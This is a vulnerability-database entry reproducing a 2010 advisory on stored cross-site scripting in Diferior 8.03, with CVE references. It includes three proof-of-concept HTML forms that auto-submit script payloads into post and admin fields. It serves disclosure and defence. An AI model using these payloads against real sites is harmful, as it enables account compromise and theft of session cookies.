Lucene search
+L

Diferior 8.03 - Multiple Cross-Site Scripting Vulnerabilities

🗓️ 29 Nov 2010 00:00:00Reported by High-Tech Bridge SAType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Vulnerabilities in Diferior 8.03 - Multiple XS

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2010-4850
27 Sep 201110:00
cve
cvelist
Cvelist
CVE-2010-4850
27 Sep 201110:00
cvelist
euvd
EUVD
EUVD-2010-4815
7 Oct 202500:30
euvd
htbridge
htbridge
Multiple Vulnerabilities in Diferior
25 Nov 201000:00
htbridge
nvd
NVD
CVE-2010-4850
27 Sep 201110:55
nvd
prion
Prion
Cross site scripting
27 Sep 201110:55
prion
Vulnerability ID: HTB22721
Reference: http://www.htbridge.ch/advisory/stored_xss_cross_site_scripting_vulnerability_in_diferior.html
Product: Diferior
Vendor: Povilas Musteikis ( http://www.diferior.com/ )
Vulnerable Version: 8.03 and probably prior versions
Vendor Notification:
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "views/post.php" script to properly sanitize user-supplied input in "post_content" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/post/edit/2/p1.html" method="post" enctype="multipart/form-data" name="main">
<input type="hidden" name="category" value="sample-category-1">
<input type="hidden" name="header" value="Sample post">
<input type="hidden" name="subheader" value="Sample subheader">
<input type="hidden" name="post_content" value='html<script>alert(document.cookie)</script>'>
<input type="hidden" name="schedule" value="now">
<input type="hidden" name="scheduler" value="10/11/23">
<input type="hidden" name="Date_Year" value="2010">
<input type="hidden" name="Date_Month" value="11">
<input type="hidden" name="Date_Day" value="22">
<input type="hidden" name="Time_Hour" value="20">
<input type="hidden" name="Time_Minute" value="47">
<input type="hidden" name="Time_Second" value="23">
<input type="hidden" name="usehtml" value="html">
</form>
<script>
document.main.submit();
</script>


Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "views/admin.php" script to properly sanitize user-supplied input in "slogan" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/site/2.html" method="post" name="main">
<input type="hidden" name="title" value="Site Title">
<input type="hidden" name="slogan" value='Powered by Diferior"><script>alert(document.cookie)</script>'>
<input type="hidden" name="timezone" value="GMT">
<input type="hidden" name="cron" value="php">
</form>
<script>
document.main.submit();
</script>


Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "views/admin.php" script to properly sanitize user-supplied input in "subcatname" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/forum/create_sub.html" method="post" name="main">
<input type="hidden" name="cat" value="1">
<input type="hidden" name="subcatname" value='subname"><script>alert(document.cookie)</script>'>
<input type="hidden" name="description" value='description"><script>alert(document.cookie)</script>'>
</form>
<script>
document.main.submit();
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Nov 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.01766
38